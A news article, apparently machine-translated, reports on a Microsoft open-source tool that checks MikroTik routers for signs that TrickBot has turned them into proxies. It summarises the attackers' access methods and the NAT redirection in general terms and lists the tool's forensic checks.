The Microsoft tool detects if the MikroTik router is not connected to the TrickBot botnet

Posted by

Microsoft has released a new tool that can scan MikroTik routers for hacks and tricks in the TrickBot botnet. In this case, the affected routers act as a proxy server between the control server and the infected computers.

Malware TrickBot has been using IoT devices, such as routers, for years to act as an intermediary between infected devices and control servers. The purpose of the proxy server transmitting orders is to prevent security experts and law enforcement agencies from investigating and disrupting infrastructure.

Click for larger image TrickBot malware attack scheme

Attacks and configuration changes

In a new report, Microsoft experts explain how the group around TrickBot focused on vulnerable MikroTik routers and used various methods to exploit them. Both the default credentials (which users often do not change) and password cracking with brute force were used to attack the network elements of this brand.

If these methods did not provide access to the router, the attackers tried to exploit more than three years old Directory Crawl Critical Vulnerability CVE-2018-14847. It allows unauthorized remote attackers to read arbitrary files. Using this vulnerability, they simply stole the file user.datwhich contains login user data.

Click for larger image Direct communication between the infected device and the control server

After gaining access to the device, attackers used commands to create a network address translation (NAT) rule. As a result, routers willingly redirected traffic from control servers to computers within the local network. The attackers appear to be familiar with the limited features of the Linux operating system on MikroTik devices and use SSH commands that would not make sense on other devices.

Click your router

“In addition to the method described in this paper, we have identified several ways of attacking these devices. We have summarized our knowledge of these methods and known CVEs into an open-source tool that can extract forensic artifacts related to these attacks. “ reports the Microsoft Defender research team for IoT.

Here is a list of some of the features that the tool can do:

  • Obtain the device version and view the detected vulnerabilities.
  • Check scheduled tasks.
  • Search for traffic redirection rules (NAT and other rules).
  • Look for DNS cache poisoning.
  • Look for a change to the default ports.
  • Search for users who are not by default.

The tool is published on the GitHub server and can search for suspicious features and vulnerabilities that need to be fixed on the router. So if you have a MikroTik router at home or in your company, then it is definitely a good idea check if it does not act as a proxy server for malicious activities.

Source link

Leave a Reply

Your email address will not be published.